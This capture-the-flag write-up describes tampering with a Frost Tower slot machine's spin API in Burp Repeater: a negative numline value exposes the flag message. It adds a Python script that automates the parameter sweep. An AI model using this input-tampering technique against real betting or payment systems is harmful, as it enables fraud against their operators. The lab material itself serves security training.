Slot Machine Investigation
Challenge: Test the security of Jack Frost's slot machines. What does the Jack Frost Tower casino security team threaten to do when your coin total exceeds 1000? Submit the string in the server data.response element. Talk to Noel Boetie outside Santa's Castle for help.

Difficulty Level:
Location: Frost Tower Lobby
Elf/Troll: Hubris Selfington

Hints from Hubris Selfington:
The big boss told me he’s worried about vulnerabilities in his slot machines, especially this one. Statistically speaking, it seems to be paying out way too much. He asked me to see if there are any security flaws in it. The boss has HUGE plans and we’ve gotta make sure we are running a tight ship here at Frost Tower.
Hint: The objective states “Submit the string in the server data.response element”
Clicking on the slot machine behind the troll opens https://slots.jackfrosttower.com, where we click “Play game” to open the game.
We open Burp Suite and restrict the proxy scope to slots.jackfrosttower.com so only that host's traffic is captured.
Click "Spin" in the bottom right corner.
Burp intercepts the request: a POST to /api/v1/ carrying three parameters:
- betamount
- numline
- cpl
We send the request to Repeater and first set betamount to 1001; the server does not accept the bet.
Keeping betamount at 1001 (the objective is about a coin total above 1000), we vary the other two parameters, numline and cpl, and resend each variant to the API to see which one the server accepts.
Parameter values tried in Repeater (betamount held at 1001):

- Decrease cpl to 0.0
- Increase cpl to 0.2
- Decrease numline to 10
- Increase numline to 30
- Make numline a negative number
The full request and response show that sending a negative value in the numline parameter makes the server add a new field named "response" to its reply; the other variants do not.
The successful response:
data.response :
I'm going to have some bouncer trolls bounce you right out of this casino!
We submit this string as the answer for the Slot Machine Investigation objective and it is accepted!
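The Repeater experiment above can be scripted so each parameter variant is sent and any reply carrying a data.response field is flagged automatically. The following is an added example written for this page, not code from the writeup or from the slots site. The parameter names (betamount, numline, cpl) and the variants come from the page; the form-encoded request body, the JSON shape of the reply, the baseline numline/cpl values, the exact negative numline value and the endpoint URL passed to run_live are assumptions to adjust to what Burp actually shows. The sample reply bodies at the bottom are constructed so the parsing runs offline.

```python
"""Replay the Repeater parameter manipulation as a script (added example).

Assumptions (not taken from the page): the spin request is
application/x-www-form-urlencoded, the reply is JSON with a top-level
"data" object, and the endpoint URL is supplied by the caller.
"""
import json
import urllib.parse
import urllib.request


def candidate_payloads(betamount=1001):
    """Return the (label, form fields) variants tried in the writeup.

    betamount is held at 1001 while numline and cpl are varied. The
    baseline numline=20 / cpl=0.1 and the negative value -1 are assumed.
    """
    base = {"betamount": str(betamount), "numline": "20", "cpl": "0.1"}
    variants = [
        ("baseline", {}),
        ("cpl decreased to 0.0", {"cpl": "0.0"}),
        ("cpl increased to 0.2", {"cpl": "0.2"}),
        ("numline decreased to 10", {"numline": "10"}),
        ("numline increased to 30", {"numline": "30"}),
        ("numline negative", {"numline": "-1"}),
    ]
    return [(label, {**base, **change}) for label, change in variants]


def response_message(body):
    """Return data.response from a JSON reply body, or None if it is absent.

    Tolerates non-JSON and unexpected shapes so a malformed reply is
    reported as "no message" rather than crashing the sweep.
    """
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return None
    data = doc.get("data") if isinstance(doc, dict) else None
    if not isinstance(data, dict):
        return None
    msg = data.get("response")
    return msg if isinstance(msg, str) else None


def find_flagged_variants(results):
    """Given [(label, reply body)], return [(label, message)] for replies
    that carried a data.response field."""
    hits = []
    for label, body in results:
        msg = response_message(body)
        if msg is not None:
            hits.append((label, msg))
    return hits


def send_spin(endpoint, fields, cookie=None, timeout=10):
    """POST one form-encoded spin and return the raw reply body.

    Network call; copy the session cookie from the intercepted request.
    """
    body = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(endpoint, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def run_live(endpoint, cookie=None):
    """Send every variant to the endpoint seen in Burp and report hits."""
    results = [(label, send_spin(endpoint, f, cookie))
               for label, f in candidate_payloads()]
    return find_flagged_variants(results)


# Constructed sample replies (not captured from the real server): a normal
# spin with no "response" field, and the negative-numline reply that
# carries the bouncer-troll message quoted in the writeup.
SAMPLE_RESULTS = [
    ("cpl decreased to 0.0", '{"success": true, "data": {"credit": 1000}}'),
    ("numline negative",
     '{"success": true, "data": {"response": '
     '"I\'m going to have some bouncer trolls bounce you right out of this casino!"}}'),
]

if __name__ == "__main__":
    for label, msg in find_flagged_variants(SAMPLE_RESULTS):
        print(f"{label}: {msg}")
```

Run it as-is to see the offline parsing over the constructed replies; for the real target call run_live with the endpoint and Cookie header copied from the intercepted POST, and compare which variant the server answers with a data.response field.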